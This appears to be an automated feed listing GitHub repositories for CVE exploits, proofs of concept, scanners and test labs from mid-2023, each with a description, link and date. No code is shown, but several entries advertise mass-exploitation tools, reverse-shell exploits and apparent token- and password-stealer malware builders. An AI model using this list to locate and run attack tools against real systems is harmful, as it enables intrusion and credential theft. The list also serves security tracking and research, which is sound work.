**I'm write a exploit&scan for exploitation SQl Injection in WP from CVE-2022-0412** : [TcherB31/CVE-2022-0412_Exploit](https://github.com/TcherB31/CVE-2022-0412_Exploit) create time: 2023-08-25T16:54:28Z

**no description** : [ZenNotMovie/cve-2023-winrar](https://github.com/ZenNotMovie/cve-2023-winrar) create time: 2023-08-25T13:42:31Z

**no description** : [krmxd/CVE-2023-2868](https://github.com/krmxd/CVE-2023-2868) create time: 2023-08-25T13:07:51Z

**no description** : [b1tg/CVE-2023-38831-winrar-exploit](https://github.com/b1tg/CVE-2023-38831-winrar-exploit) create time: 2023-08-25T09:44:08Z

**no description** : [watchtowrlabs/juniper-rce_cve-2023-36844](https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844) create time: 2023-08-25T07:28:06Z

**POC of the CVE-2023-39063** : [AndreGNogueira/CVE-2023-39063](https://github.com/AndreGNogueira/CVE-2023-39063) create time: 2023-08-24T20:57:27Z

**no description** : [ptkhai15/OverlayFS---CVE-2021-3493](https://github.com/ptkhai15/OverlayFS---CVE-2021-3493) create time: 2023-08-25T07:26:35Z

**Weaponized CobaltStrike BOF for CVE-2023-36874 Windows Error Reporting LPE** : [Octoberfest7/CVE-2023-36874_BOF](https://github.com/Octoberfest7/CVE-2023-36874_BOF) create time: 2023-08-24T22:24:34Z

**The question echoes—why peel back the layers of the Exploit JPG? The answer resonates with collective determination. These vulnerabilities extend beyond the purview of their originators, disseminating their influence amongst countless entities. As the web of access widens, so does the scope of the issue** : [RCSDARK/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/RCSDARK/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2023-08-24T19:31:55Z

**Chromium Chronicles: Journeying through the annals of Chromium-based browsers, unearthing the chronicles of passwords, credit cards, cookies, history, autofill, bookmarks—a treasure trove that whispers secrets of digital live** : [RCSDARK/Discord-Image-Token-Password-Grabber-Exploit-Cve-2023](https://github.com/RCSDARK/Discord-Image-Token-Password-Grabber-Exploit-Cve-2023) create time: 2023-08-24T19:28:35Z

**CVE-2023-38035 Recon oriented exploit, extract company name contact information** : [LeakIX/sentryexploit](https://github.com/LeakIX/sentryexploit) create time: 2023-08-24T19:26:57Z

**bash script for automated discovery and exploitation of machines with the CVE-2022-39986 vulnerability** : [mind2hex/RaspAP_Hunter](https://github.com/mind2hex/RaspAP_Hunter) create time: 2023-08-24T16:48:27Z

**This is to create ruby version to python of ruby exploit** : [0nyx-hkr/cve_2022_26904](https://github.com/0nyx-hkr/cve_2022_26904) create time: 2023-08-24T15:43:32Z

**lazy way to create CVE-2023-38831 winrar file for testing** : [BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc](https://github.com/BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc) create time: 2023-08-24T16:03:07Z

**PHP CGI Argument Injection.** : [0xl0k1/CVE-2012-1823](https://github.com/0xl0k1/CVE-2012-1823) create time: 2023-08-24T11:17:51Z

**Ivanti Sentry CVE-2023-38035** : [horizon3ai/CVE-2023-38035](https://github.com/horizon3ai/CVE-2023-38035) create time: 2023-08-23T17:34:36Z

**CVE-2023-26255_POC,CVE-2023-26256_POC** : [aodsec/CVE-2023-26256](https://github.com/aodsec/CVE-2023-26256) create time: 2023-08-24T01:57:00Z

**Browsers founded on the bedrock of Firefox (consisting of databases, cookies, historical imprints, and cherished bookmarks), Envoys of the Internet (a.k.a. Internet Explorer/Edge) harboring the secrets of passwords.** : [benedixX0/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/benedixX0/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2023-08-23T22:48:10Z

**Journeying along the chronicle of vulnerability revelation, we unveil a tapestry woven in meticulous detail. A scrutiny, inching ever closer to the core of the Exploit JPG's essence, exposes a web of malevolence—a tale where the ominous link intertwines with the very URL that orchestrates a symphony of download and execution. At the helm of this or** : [benedixX0/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2023](https://github.com/benedixX0/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2023) create time: 2023-08-23T22:57:07Z

**Spipu Html2Pdf < 5.2.8 - XSS vulnerabilities in example files** : [afine-com/CVE-2023-39062](https://github.com/afine-com/CVE-2023-39062) create time: 2023-08-23T21:07:24Z

**CVE-2023-36874 Proof of Concept** : [crisprss/CVE-2023-36874](https://github.com/crisprss/CVE-2023-36874) create time: 2023-08-22T16:27:30Z

**no description** : [Wh04m1001/CVE-2023-36874](https://github.com/Wh04m1001/CVE-2023-36874) create time: 2023-08-23T12:07:40Z

**no description** : [Wh04m1001/CVE-2023-36874](https://github.com/Wh04m1001/CVE-2023-36874) create time: 2023-08-23T10:09:40Z

**Lab environment to test CVE-2023-25725** : [sgwgsw/LAB-CVE-2023-25725](https://github.com/sgwgsw/LAB-CVE-2023-25725) create time: 2023-08-23T04:32:54Z

**LifterLMS <= 3.34.5 - Unauthenticated Options Import** : [RandomRobbieBF/CVE-2019-15896](https://github.com/RandomRobbieBF/CVE-2019-15896) create time: 2023-08-22T18:56:09Z

**Open Web Analytics 1.7.3 - Remote Code Execution Exploit v2** : [0xRyuk/CVE-2022-24637](https://github.com/0xRyuk/CVE-2022-24637) create time: 2023-08-22T16:25:52Z

**CVE-2022-2588** : [veritas501/CVE-2022-2588](https://github.com/veritas501/CVE-2022-2588) create time: 2023-03-02T07:45:22Z

**POC Microsoft SharePoint Remote Code Execution Vulnerability** : [hipnesspatten/CVE-2023-33157](https://github.com/hipnesspatten/CVE-2023-33157) create time: 2023-08-22T02:01:04Z

**POC Microsoft SharePoint Server Remote Code Execution Vulnerability** : [hipnesspatten/CVE-2023-33160](https://github.com/hipnesspatten/CVE-2023-33160) create time: 2023-08-22T02:00:13Z

**POC Citrix vulnerability scanner. Auto Exploit** : [knitteruntil0s/CVE-2023-3519](https://github.com/knitteruntil0s/CVE-2023-3519) create time: 2023-08-22T01:33:01Z

**POC WinRAR vulnerable to remote code execution,** : [whalersplonk/CVE-2023-40477](https://github.com/whalersplonk/CVE-2023-40477) create time: 2023-08-22T01:10:53Z

**CVE-2023-36874 Proof of Concept** : [c4m3l-security/CVE-2023-36874](https://github.com/c4m3l-security/CVE-2023-36874) create time: 2023-08-21T22:04:28Z

**no description** : [3tternp/CVE-2023-21554](https://github.com/3tternp/CVE-2023-21554) create time: 2023-08-17T17:16:46Z

**CVE-2023-29409 reproducer** : [mateusz834/CVE-2023-29409](https://github.com/mateusz834/CVE-2023-29409) create time: 2023-08-21T15:59:26Z

**test** : [obelia01/CVE-2023-9999](https://github.com/obelia01/CVE-2023-9999) create time: 2023-08-21T12:02:45Z

**no description** : [obelia01/CVE-2023-5546](https://github.com/obelia01/CVE-2023-5546) create time: 2023-08-21T11:50:01Z

**no description** : [passwa11/HITCON-2023-Demo-CVE-2023-20562](https://github.com/passwa11/HITCON-2023-Demo-CVE-2023-20562) create time: 2023-08-21T06:25:09Z

**CVE-2023-28432检测工具** : [bingtangbanli/CVE-2023-28432](https://github.com/bingtangbanli/CVE-2023-28432) create time: 2023-08-21T06:03:25Z

**no description** : [zeze-zeze/HITCON-2023-Demo-CVE-2023-20562](https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562) create time: 2023-08-21T00:31:50Z

**no description** : [rjt-gupta/CVE-2020-24089](https://github.com/rjt-gupta/CVE-2020-24089) create time: 2023-08-20T21:40:07Z

**no description** : [rjt-gupta/CVE-2020-24088](https://github.com/rjt-gupta/CVE-2020-24088) create time: 2023-08-20T21:38:41Z

**python3 version of the CVE-2019-9978 exploit** : [h8handles/CVE-2019-9978-Python3](https://github.com/h8handles/CVE-2019-9978-Python3) create time: 2023-08-20T20:27:38Z

**Polkit 0.105-26 0.117-2 - Local Privilege Escalation** : [pashayogi/ROOT-CVE-2021-3560](https://github.com/pashayogi/ROOT-CVE-2021-3560) create time: 2023-08-20T14:39:19Z

**Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation'** : [pashayogi/CVE-2021-22555](https://github.com/pashayogi/CVE-2021-22555) create time: 2023-08-20T14:26:28Z

**CVE-2023-36874 PoC** : [d0rb/CVE-2023-36874](https://github.com/d0rb/CVE-2023-36874) create time: 2023-08-20T13:50:42Z

**CVE-2021-34527 PrintNightmare PoC** : [d0rb/CVE-2021-34527](https://github.com/d0rb/CVE-2021-34527) create time: 2023-08-20T12:04:18Z

**no description** : [codeb0ss/CVE-2023-3836](https://github.com/codeb0ss/CVE-2023-3836) create time: 2023-08-20T03:16:31Z

**Mass Exploit - CVE-2023-20073 - Cisco VPN Routers - [Unauthenticated Arbitrary File Upload and Stored XSS]** : [codeb0ss/CVE-2023-20073-](https://github.com/codeb0ss/CVE-2023-20073-) create time: 2023-08-20T02:45:50Z

**no description** : [LUCASRENAA/CVE-2018-25031](https://github.com/LUCASRENAA/CVE-2018-25031) create time: 2023-08-19T21:20:44Z

**no description** : [Arajawat007/CVE-2023-39708](https://github.com/Arajawat007/CVE-2023-39708) create time: 2023-08-19T19:02:23Z

**no description** : [Arajawat007/CVE-2023-39714](https://github.com/Arajawat007/CVE-2023-39714) create time: 2023-08-19T18:47:27Z

**no description** : [Arajawat007/CVE-2023-39712](https://github.com/Arajawat007/CVE-2023-39712) create time: 2023-08-19T18:42:28Z

**no description** : [Arajawat007/CVE-2023-39709](https://github.com/Arajawat007/CVE-2023-39709) create time: 2023-08-19T18:35:44Z

**no description** : [Arajawat007/CVE-2023-39711](https://github.com/Arajawat007/CVE-2023-39711) create time: 2023-08-19T18:13:14Z

**no description** : [Arajawat007/CVE-2023-39710](https://github.com/Arajawat007/CVE-2023-39710) create time: 2023-08-19T18:09:59Z

**no description** : [Arajawat007/CVE-2023-39707](https://github.com/Arajawat007/CVE-2023-39707) create time: 2023-08-19T17:35:39Z

**Metabase Pre-auth RCE (CVE-2023-38646)** : [kh4sh3i/CVE-2023-38646](https://github.com/kh4sh3i/CVE-2023-38646) create time: 2023-08-19T11:47:08Z

**no description** : [h4ck0rman/CVE-2019-15107](https://github.com/h4ck0rman/CVE-2019-15107) create time: 2023-08-19T05:41:39Z

**A PoC exploit for CVE-2018-9995 - DVR Authentication Bypass** : [K3ysTr0K3R/CVE-2018-9995-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2018-9995-EXPLOIT) create time: 2023-08-18T19:42:17Z

**no description** : [Pandante-Central/CVE-2023-24329-codeql-test](https://github.com/Pandante-Central/CVE-2023-24329-codeql-test) create time: 2023-08-18T16:53:11Z

**poc** : [akshadjoshi/CVE-2023-38890](https://github.com/akshadjoshi/CVE-2023-38890) create time: 2023-08-18T16:37:39Z

**LearnPress Plugin < 4.2.0 - Unauthenticated SQLi** : [RandomRobbieBF/CVE-2022-45808](https://github.com/RandomRobbieBF/CVE-2022-45808) create time: 2023-08-18T15:43:50Z

**LearnPress Plugin < 4.2.0 - Unauthenticated LFI Description** : [RandomRobbieBF/CVE-2022-47615](https://github.com/RandomRobbieBF/CVE-2022-47615) create time: 2023-08-18T15:04:36Z

**Python rewrite of the POC for CVE-2023-34634** : [radman404/CVE-2023-34634](https://github.com/radman404/CVE-2023-34634) create time: 2023-08-18T09:00:44Z

**no description** : [Priece001/cve-2023-3499](https://github.com/Priece001/cve-2023-3499) create time: 2023-08-18T06:19:59Z

**PoC based on https://unsafe[.]sh/go-173464.html research** : [RegularITCat/CVE-2023-20073](https://github.com/RegularITCat/CVE-2023-20073) create time: 2023-08-18T02:42:50Z

**no description** : [risuxx/CVE-2023-34853](https://github.com/risuxx/CVE-2023-34853) create time: 2023-08-16T15:13:49Z

**Exploit de reverseshell para desserialização em NodeJs (CVE-2017-5941)** : [arthurvmbl/nodejshell](https://github.com/arthurvmbl/nodejshell) create time: 2023-08-18T00:54:43Z

**CVE-2022-20009 - Description and sample exploit for Android USB Gadgets** : [szymonh/android-gadget](https://github.com/szymonh/android-gadget) create time: 2023-08-06T10:01:32Z

**no description** : [asepsaepdin/CVE-2022-21907](https://github.com/asepsaepdin/CVE-2022-21907) create time: 2023-08-17T13:58:00Z

**no description** : [H4R335HR/CVE-2023-24329-PoC](https://github.com/H4R335HR/CVE-2023-24329-PoC) create time: 2023-08-17T10:33:52Z

**CVE-2023-39143 < PaperCut < Path Traversal (PT)** : [codeb0ss/CVE-2023-39143](https://github.com/codeb0ss/CVE-2023-39143) create time: 2023-08-17T02:57:48Z

**CVE-2023-4174 - mooSocial 3.1.6 - Reflected Cross Site Scripting (XSS)** : [codeb0ss/CVE-2023-4174](https://github.com/codeb0ss/CVE-2023-4174) create time: 2023-08-17T02:44:49Z

**no description** : [tianstcht/CVE-2023-2033](https://github.com/tianstcht/CVE-2023-2033) create time: 2023-08-17T02:40:42Z

**CVE-2023-37979 - WordPress Authenticated XSS in Ninja-forms Plugin + Upload File** : [codeb0ss/CVE-2023-37979](https://github.com/codeb0ss/CVE-2023-37979) create time: 2023-08-17T02:24:42Z

**Python Code For CVE-2012-2982** : [Dawnn3619/CVE-2012-2982](https://github.com/Dawnn3619/CVE-2012-2982) create time: 2023-08-16T23:58:49Z

**Exploit for file upload vulnerability in BoidCMS version <=2.0.0** : [1337kid/CVE-2023-38836](https://github.com/1337kid/CVE-2023-38836) create time: 2023-08-16T14:30:30Z

**no description** : [Trinadh465/linux-4.1.15_CVE-2018-5873](https://github.com/Trinadh465/linux-4.1.15_CVE-2018-5873) create time: 2023-08-16T11:35:08Z

**no description** : [nidhi7598/linux-4.1.15_CVE-2018-5873](https://github.com/nidhi7598/linux-4.1.15_CVE-2018-5873) create time: 2023-08-16T11:23:57Z

**CVE-2022-39986 PoC** : [WhiteOwl-Pub/RaspAP-CVE-2022-39986-PoC](https://github.com/WhiteOwl-Pub/RaspAP-CVE-2022-39986-PoC) create time: 2023-08-16T11:32:26Z

**HW2023@POC@EXP@CVE-2023-2023** : [GREENHAT7/Hvv2023](https://github.com/GREENHAT7/Hvv2023) create time: 2023-08-13T05:54:17Z

**CVE-2023-36899漏洞的复现环境和工具,针对ASP.NET框架中的无cookie会话身份验证绕过。** : [midisec/CVE-2023-36899](https://github.com/midisec/CVE-2023-36899) create time: 2023-08-15T23:36:17Z

**CVE-2023-2640 CVE-2023-32629** : [OllaPapito/gameoverlay](https://github.com/OllaPapito/gameoverlay) create time: 2023-08-15T19:07:02Z

**GitHub repository for CVE-2023-3460 POC** : [BlackReaperSK/CVE-2023-3460_POC](https://github.com/BlackReaperSK/CVE-2023-3460_POC) create time: 2023-08-15T16:56:53Z

**CVE-2023-2916 PoC** : [d0rb/CVE-2023-2916](https://github.com/d0rb/CVE-2023-2916) create time: 2023-08-15T13:51:38Z

**CVE-2023-33242 PoC** : [d0rb/CVE-2023-33242](https://github.com/d0rb/CVE-2023-33242) create time: 2023-08-15T13:46:48Z

**no description** : [mistymntncop/CVE-2023-3079](https://github.com/mistymntncop/CVE-2023-3079) create time: 2023-08-15T04:16:46Z

**no description** : [mandiant/citrix-ioc-scanner-cve-2023-3519](https://github.com/mandiant/citrix-ioc-scanner-cve-2023-3519) create time: 2023-08-10T18:22:57Z

**Stakater Forecastle 1.0.127 allows directory traversal in the website component** : [sahar042/CVE-2023-40297](https://github.com/sahar042/CVE-2023-40297) create time: 2023-08-14T06:18:48Z

**Proof of Concept for CVE-2023-40296** : [Halcy0nic/CVE-2023-40296](https://github.com/Halcy0nic/CVE-2023-40296) create time: 2023-08-14T05:21:27Z

**Proof of concept for CVE-2023-40294 and CVE-2023-40295** : [Halcy0nic/CVE-2023-40294-and-CVE-2023-40295](https://github.com/Halcy0nic/CVE-2023-40294-and-CVE-2023-40295) create time: 2023-08-14T05:12:05Z

**This is a combination of the zerologon_tester.py code (https://raw.githubusercontent.com/SecuraBV/CVE-2020-1472/master/zerologon_tester.py) and the tool evil-winrm to get a shell.** : [Anthonyc3rb3ru5/ZeroLogon-to-Shell](https://github.com/Anthonyc3rb3ru5/ZeroLogon-to-Shell) create time: 2023-08-14T02:40:18Z

**no description** : [qwqdanchun/CVE-2023-27363](https://github.com/qwqdanchun/CVE-2023-27363) create time: 2023-05-15T16:09:19Z

**no description** : [Nithisssh/CVE-2022-3457](https://github.com/Nithisssh/CVE-2022-3457) create time: 2023-08-13T18:28:33Z

**no description** : [Nithisssh/CVE-2022-1036](https://github.com/Nithisssh/CVE-2022-1036) create time: 2023-08-13T17:59:18Z

**no description** : [Nithisssh/CVE-2022-0688](https://github.com/Nithisssh/CVE-2022-0688) create time: 2023-08-13T15:22:30Z

**no description** : [Nithisssh/CVE-2022-0558](https://github.com/Nithisssh/CVE-2022-0558) create time: 2023-08-13T14:43:13Z

**no description** : [Nithisssh/CVE-2022-0379](https://github.com/Nithisssh/CVE-2022-0379) create time: 2023-08-13T13:34:43Z

**A quick python script that automates the exploitation of the second deadliest Java based vulnerability CVE-2022-22965.** : [h4ck0rman/Spring4Shell-PoC](https://github.com/h4ck0rman/Spring4Shell-PoC) create time: 2023-08-13T11:42:22Z

**CVE-2023-27163 Request-Baskets v1.2.1 - Server-side request forgery (SSRF)** : [0xFTW/CVE-2023-27163](https://github.com/0xFTW/CVE-2023-27163) create time: 2023-08-13T08:49:24Z

**CVE-2022-44268_By_Kyokito** : [chairat095/CVE-2022-44268_By_Kyokito](https://github.com/chairat095/CVE-2022-44268_By_Kyokito) create time: 2023-08-13T04:43:12Z

**Golang PoC for CVE-2023-27163 Mailtrail Exploit** : [thomas-osgood/CVE-2023-27163](https://github.com/thomas-osgood/CVE-2023-27163) create time: 2023-08-13T04:19:50Z

**no description** : [K3ysTr0K3R/CVE-2021-34621-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-34621-EXPLOIT) create time: 2023-08-12T21:51:37Z

**Ghostscript command injection vulnerability PoC (CVE-2023-36664)** : [jakabakos/CVE-2023-36664-Ghostscript-command-injection](https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection) create time: 2023-08-12T18:33:57Z

**Apache Solr Poc CVE-2017-3164 CVE-2017-12629** : [tdwyer/PoC_CVE-2017-3164_CVE-2017-1262](https://github.com/tdwyer/PoC_CVE-2017-3164_CVE-2017-1262) create time: 2023-08-11T20:48:31Z

**Check for CVE-2023-32629 "GameOver(lay)" vulnerability** : [kaotickj/Check-for-CVE-2023-32629-GameOver-lay](https://github.com/kaotickj/Check-for-CVE-2023-32629-GameOver-lay) create time: 2023-08-11T21:08:38Z

**CVE-2023-36899 PoC** : [d0rb/CVE-2023-36899](https://github.com/d0rb/CVE-2023-36899) create time: 2023-08-11T14:33:19Z

**CVE-2021-41773 testing using MSF** : [belajarqywok/cve-2021-41773-msf](https://github.com/belajarqywok/cve-2021-41773-msf) create time: 2023-08-11T12:12:09Z

**CVE-2020-10132 - SearchBlox product before V-9.1 is vulnerable to CORS misconfiguration.** : [InfoSec4Fun/CVE-2020-10132](https://github.com/InfoSec4Fun/CVE-2020-10132) create time: 2023-08-11T09:34:34Z

**CVE-2020-10131 - SearchBlox Product before V-9.2.1 is Vulnerable to CSV macro injection.** : [InfoSec4Fun/CVE-2020-10131](https://github.com/InfoSec4Fun/CVE-2020-10131) create time: 2023-08-11T09:31:15Z

**CVE-2020-10130 - SearchBlox Product before V-9.1 is vulnerable to Business logic bypass** : [InfoSec4Fun/CVE-2020-10130](https://github.com/InfoSec4Fun/CVE-2020-10130) create time: 2023-08-11T09:26:52Z

**CVE-2020-10129 - SearchBlox product before V-9.2 is vulnerable to Privileged Escalation-Lower user is able to access Admin** : [InfoSec4Fun/CVE-2020-10129](https://github.com/InfoSec4Fun/CVE-2020-10129) create time: 2023-08-11T09:18:50Z

**CVE-2020-10128 - SearchBlox product before V-9.2.1 is vulnerable to Stored-Cross Site Scripting** : [InfoSec4Fun/CVE-2020-10128](https://github.com/InfoSec4Fun/CVE-2020-10128) create time: 2023-08-11T08:59:35Z

**CVE-2023-4174 PoC** : [d0rb/CVE-2023-4174](https://github.com/d0rb/CVE-2023-4174) create time: 2023-08-11T08:48:02Z

**CVE-2023-33246 POC** : [d0rb/CVE-2023-33246](https://github.com/d0rb/CVE-2023-33246) create time: 2023-08-11T08:45:29Z

**Lexmark CVE-2023-26067** : [horizon3ai/CVE-2023-26067](https://github.com/horizon3ai/CVE-2023-26067) create time: 2023-08-07T20:55:15Z

**no description** : [yosef0x01/CVE-2023-21752](https://github.com/yosef0x01/CVE-2023-21752) create time: 2023-08-10T16:55:06Z

**Prestashop fix vulnerability CVE-2023-39526 & CVE-2023-39527** : [dnkhack/fixcve2023_39526_2023_39527](https://github.com/dnkhack/fixcve2023_39526_2023_39527) create time: 2023-08-10T16:51:56Z

**no description** : [Dlux-cyber-projects/cve-search-2023](https://github.com/Dlux-cyber-projects/cve-search-2023) create time: 2023-08-09T13:17:22Z

**no description** : [rvizx/CVE-2023-27163](https://github.com/rvizx/CVE-2023-27163) create time: 2023-08-09T10:47:01Z

**PoC for the recent critical vuln effecting OpenSSH versions < 9.3p2** : [kali-mx/CVE-2023-38408](https://github.com/kali-mx/CVE-2023-38408) create time: 2023-08-09T19:56:07Z

**Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber + Arbitrary Plugin Installation** : [RandomRobbieBF/CVE-2021-24356](https://github.com/RandomRobbieBF/CVE-2021-24356) create time: 2023-08-09T18:24:19Z

**no description** : [lotusexpeditor/CVE-2023-XXX1](https://github.com/lotusexpeditor/CVE-2023-XXX1) create time: 2023-08-09T16:36:32Z

**Automatic Tools For Metabase Exploit Known As CVE-2023-38646** : [robotmikhro/CVE-2023-38646](https://github.com/robotmikhro/CVE-2023-38646) create time: 2023-08-09T14:05:24Z

**ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation** : [RandomRobbieBF/CVE-2021-34621](https://github.com/RandomRobbieBF/CVE-2021-34621) create time: 2023-08-09T11:41:56Z

**A PoC exploit for CVE-2022-0165 - Page Builder KingComposer WordPress Plugin - ID Parameter Validation Bypass** : [K3ysTr0K3R/CVE-2022-0165-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2022-0165-EXPLOIT) create time: 2023-08-09T11:53:18Z

**PublishPress Capabilities < 2.3.1 - Unauthenticated Arbitrary Options Update to Blog Compromise** : [RandomRobbieBF/CVE-2021-25032](https://github.com/RandomRobbieBF/CVE-2021-25032) create time: 2023-08-09T10:41:07Z

**no description** : [lotusexpeditor/CVE-2023-XXXX](https://github.com/lotusexpeditor/CVE-2023-XXXX) create time: 2023-08-09T07:53:27Z

**CVE-2023-30533** : [BenEdridge/CVE-2023-30533](https://github.com/BenEdridge/CVE-2023-30533) create time: 2023-08-09T06:48:32Z

**no description** : [Any3ite/cve-2023-38646-metabase-ReverseShell](https://github.com/Any3ite/cve-2023-38646-metabase-ReverseShell) create time: 2023-08-09T05:07:11Z

**no description** : [Mr-Secure-Code/CVE-2023-37068-Exploit](https://github.com/Mr-Secure-Code/CVE-2023-37068-Exploit) create time: 2023-08-09T04:47:47Z

**no description** : [superlink996/cve-2017-9443-payload](https://github.com/superlink996/cve-2017-9443-payload) create time: 2023-08-09T00:37:32Z

**Original Exploit Source: https://www.exploit-db.com/exploits/46635** : [kahluri/CVE-2019-9053](https://github.com/kahluri/CVE-2019-9053) create time: 2023-08-07T20:30:19Z

**Campcodes Online Matrimonial Website System 3.3 Cross Site Scripting** : [Raj789-sec/CVE-2023-39115](https://github.com/Raj789-sec/CVE-2023-39115) create time: 2023-08-07T16:04:49Z

**Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update** : [RandomRobbieBF/CVE-2022-0952](https://github.com/RandomRobbieBF/CVE-2022-0952) create time: 2023-08-07T14:28:11Z

**复现CVE-2023-34312所需的两个恶意dll文件** : [lan1oc/CVE-2023-34312-exp](https://github.com/lan1oc/CVE-2023-34312-exp) create time: 2023-08-07T13:09:11Z

**Simple program to take advantage of CVE-2010-2075 UnrealIRCd Backdoor Exploit** : [imperialbyte/CVE-2010-2075](https://github.com/imperialbyte/CVE-2010-2075) create time: 2023-08-07T07:16:35Z

**CVE-2022-21445** : [StevenMeow/CVE-2022-21445](https://github.com/StevenMeow/CVE-2022-21445) create time: 2023-08-07T05:59:13Z

**CVE exploitation for WebKit jsc** : [erupmi/CVE-2018-4416](https://github.com/erupmi/CVE-2018-4416) create time: 2023-08-07T05:13:34Z

**no description** : [rwincey/cve-2023-3519](https://github.com/rwincey/cve-2023-3519) create time: 2023-08-06T23:17:18Z

**no description** : [MrE-Fog/jboss-_CVE-2017-12149](https://github.com/MrE-Fog/jboss-_CVE-2017-12149) create time: 2023-08-06T12:11:43Z

**no description** : [more-kohii/CVE-2022-1015](https://github.com/more-kohii/CVE-2022-1015) create time: 2023-08-06T10:46:49Z

**Running this exploit on a vulnerable system allows a local attacker to gain a root shell on the machine.** : [Toothless5143/CVE-2023-22809](https://github.com/Toothless5143/CVE-2023-22809) create time: 2023-08-06T06:46:40Z

**Android kernel exploitation for CVE-2022-20409** : [Markakd/bad_io_uring](https://github.com/Markakd/bad_io_uring) create time: 2022-11-21T22:42:50Z

**This repo hosts TUKRU's Linux Privilege Escalation exploit (CVE-2021-22555). It demonstrates gaining root privileges via a vulnerability. Tested on Ubuntu 5.8.0-48-generic and COS 5.4.89+. Use responsibly and ethically.** : [tukru/CVE-2021-22555](https://github.com/tukru/CVE-2021-22555) create time: 2023-08-05T18:56:18Z

**no description** : [isacaya/CVE-2019-11358](https://github.com/isacaya/CVE-2019-11358) create time: 2023-08-05T14:44:42Z

**DLL Planting in the Slack 4.33.73 - CVE-2023-38820** : [TraiLeR2/DLL-Planting-Slack-4.33.73-CVE-2023-38820](https://github.com/TraiLeR2/DLL-Planting-Slack-4.33.73-CVE-2023-38820) create time: 2023-08-05T14:30:24Z

**DLL Planting in the CoD MW Warzone 2 - CVE-2023-38821** : [TraiLeR2/CoD-MW-Warzone-2---CVE-2023-38821](https://github.com/TraiLeR2/CoD-MW-Warzone-2---CVE-2023-38821) create time: 2023-08-05T13:57:42Z

**DLL Planting in the Corsair iCUE v.5.3.102 CVE-2023-38822** : [TraiLeR2/Corsair---DLL-Planting-CVE-2023-38822](https://github.com/TraiLeR2/Corsair---DLL-Planting-CVE-2023-38822) create time: 2023-08-05T13:48:36Z

**Exim < 4.90.1 RCE Vulnerability remake for Python3 with arguments passed from CLI** : [thistehneisen/CVE-2018-6789-Python3](https://github.com/thistehneisen/CVE-2018-6789-Python3) create time: 2023-08-05T11:28:49Z

**Requests Baskets (CVE-2023-27163) and Mailtrail v0.53** : [HusenjanDev/CVE-2023-27163-AND-Mailtrail-v0.53](https://github.com/HusenjanDev/CVE-2023-27163-AND-Mailtrail-v0.53) create time: 2023-08-05T09:32:00Z

**Quick PoC checker for common configurations that might be available via directory traversal due to CVE-2013-3827** : [thistehneisen/CVE-2013-3827](https://github.com/thistehneisen/CVE-2013-3827) create time: 2023-08-05T08:26:22Z

**Perform With Massive Authentication Bypass (Wordpress Mstore-API)** : [Pari-Malam/CVE-2023-2732](https://github.com/Pari-Malam/CVE-2023-2732) create time: 2023-08-05T06:38:53Z

**no description** : [passwa11/CVE-2023-3519](https://github.com/passwa11/CVE-2023-3519) create time: 2023-08-05T01:43:16Z

**RCE exploit for CVE-2023-3519** : [BishopFox/CVE-2023-3519](https://github.com/BishopFox/CVE-2023-3519) create time: 2023-07-21T20:17:43Z

**Mass Exploitation For (CVE-2023-29489)** : [ViperM4sk/cpanel-xss-177](https://github.com/ViperM4sk/cpanel-xss-177) create time: 2023-08-04T22:21:57Z

**# Exploit Title: Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated) # Date: 13.03.2022 # Exploit Author: Ashish Koli (Shikari) # Vendor Homepage: https://github.com/pluck-cms/pluck # Version: 4.7.16 # Tested on Ubuntu 20.04.3 LTS # CVE: CVE-2022-26965** : [SkDevilS/Pluck-Exploitation-by-skdevils](https://github.com/SkDevilS/Pluck-Exploitation-by-skdevils) create time: 2023-08-04T20:32:08Z

**Juju: GameOver(lay) CVE-2023-2640 and CVE-2023-32629 patcher** : [johnlettman/juju-patch-gameoverlay](https://github.com/johnlettman/juju-patch-gameoverlay) create time: 2023-08-04T18:28:52Z

**Cargo exploit from CVE-2023-38497** : [lucas-cauhe/cargo-perm](https://github.com/lucas-cauhe/cargo-perm) create time: 2023-08-04T16:36:10Z

**CVE-2023-37979 PoC and Checker** : [d0rb/CVE-2023-37979](https://github.com/d0rb/CVE-2023-37979) create time: 2023-08-04T10:31:53Z

**CVE-2023-27350. PaperCut - Unauthenticated Remote Code Execution** : [getdrive/PaperCut](https://github.com/getdrive/PaperCut) create time: 2023-08-04T08:18:48Z

**Ivanti Endpoint Manager Mobile exploit** : [getdrive/CVE-2023-35078](https://github.com/getdrive/CVE-2023-35078) create time: 2023-08-04T07:08:06Z

**no description** : [nidhi7598/linux-4.19.72_CVE-2023-35828](https://github.com/nidhi7598/linux-4.19.72_CVE-2023-35828) create time: 2023-08-04T05:18:02Z

**Vulnerable environment of CVE-2021-31805 (S2-062) for testing** : [nth347/CVE-2021-31805](https://github.com/nth347/CVE-2021-31805) create time: 2023-08-04T03:42:37Z

**Vulnerable environment of CVE-2013-2251 for testing** : [nth347/CVE-2013-2251](https://github.com/nth347/CVE-2013-2251) create time: 2023-08-04T02:52:03Z

**Vulnerable environment of CVE-2020-17530 (S2-061) for testing** : [nth347/CVE-2020-17530](https://github.com/nth347/CVE-2020-17530) create time: 2023-08-04T03:00:28Z

**Some Assmann manufactured IP-Cams leak the administrator password in their backup.** : [L1-0/CVE-2023-30146](https://github.com/L1-0/CVE-2023-30146) create time: 2023-06-08T18:18:47Z

